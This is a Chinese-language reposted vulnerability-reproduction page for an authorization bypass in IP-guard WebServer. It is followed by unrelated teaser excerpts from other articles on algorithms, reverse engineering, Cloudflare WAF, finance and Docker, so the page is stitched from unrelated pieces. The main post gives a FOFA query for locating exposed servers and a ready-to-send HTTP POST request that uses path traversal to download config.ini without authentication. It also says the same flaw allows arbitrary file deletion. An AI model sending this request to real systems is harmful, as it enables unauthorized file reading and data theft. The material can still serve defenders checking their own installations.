【漏洞复现】IP-guard WebServer 权限绕过漏洞-编程知识

【漏洞复现】IP-guard WebServer 权限绕过漏洞

news/2025/1/21 18:37:26/文章来源:https://blog.csdn.net/qq_67810151/article/details/138253090

0x01 产品简介

IP-guard WebServer 是 IP-guard 网络安全管理系统的一部分，用于提供 Web 界面以进行用户权限管理、监控和审计。

0x02 漏洞概述

IP-guard WebServer的权限验证机制中存在设计缺陷，未授权的攻击者能够规避安全验证，通过后端接口执行文件的任意读取和删除操作。

0x03 测绘语句

fofa: icon_hash="2030860561"

0x04 漏洞复现

POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1Host:Content-Type: application/x-www-form-urlencodedpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

0x05 影响范围

IP-guard Web

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.hqwc.cn/news/660073.html

如若内容造成侵权/违法违规/事实不符，请联系编程知识网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

$[C++][算法基础]四种基本背包问题(动态规划)$

[C++][算法基础]四种基本背包问题(动态规划)

1. 01背包问题有 𝑁 件物品和一个容量是 𝑉 的背包。每件物品只能使用一次。第 𝑖 件物品的体积是 𝑣𝑖，价值是 𝑤𝑖。求解将哪些物品装入背包，可使这些物品的总体…

逆向第一步去掉debugger（无任何门槛小白可学习）

准备工具 1.ReRes 地址：ReRes 用法： 用法 2.nodepad 地址：nodepad 注意下载后缀为.x64.exe版本的我这里下的npp.8.6.5.Installer.x64.exe 3给nodepad装上JSTool插件下载可省略下叙详细步骤点此链接直接下载 JSToolNpp 然后到导…

Cloudflare防火墙其他WAF设置

其他WAF设置缓存设置缓存设置好也可以帮助我们抵挡巨量的CC攻击。有些CC是很多IP随即攻击一个地址，如果我们的安全策略没有拦截到攻击。但是我们设置了缓存，那这些请求则会在CloudFlare边缘节点直接将缓存内容返回给请求。也达到了抗攻击的效果。缓…

周三多《管理学原理》第3版/考研真题/章节练习题

普通高等教育“十一五”国家级规划教材《管理学原理》（第3版，周三多、陈传明、龙静编著，南京大学出版社）是我国高校广泛采用的管理学权威教材之一，也被众多高校（包括科研机构）指定为考研考博专业…

李廉洋：4.30美债收益率飙升，黄金原油会不会受影响。

在劳工成本指数上升1.2%，超过1.0%的市场预期后，美国国债收益率立即飙升。这显然表明劳动力市场吃紧，允许美联储在更长时间内维持较高利率。2年期美债收益率直接突破5%，最高至5.03%；10年期最高至4.66%；美元大…

【数据结构】顺序表专题

前言本篇文章我们来进行有关顺序表的专题训练，让我们一起来看一下有关顺序表的算法题 💓 个人主页：小张同学zkf ⏩ 文章专栏：数据结构 📝若有问题评论区见 🎉欢迎大家点赞👍收藏⭐文章 1.移除…

Python 可视化一、条形图（或柱状图） 1.代码如下： import matplotlib.pyplot as plt import pandas as pddf pd.DataFrame({County:[America,Canada,Australia,Germany,French,China],GDP:[80,30,70,80,60,75] })plt.bar(df[County],df[G…

Docker consul 的容器服务更新与发现

目录一. consul 的相关知识 1 什么是注册与发现 2. 什么是 consul 3. zookeeper 和 consul 的区别二. consul 部署 1. consul 服务器 2. registrator 服务器三. consul-template 1. consul-template 的作用 2. consul-template 的具体部署运用 2.1 准备 templa…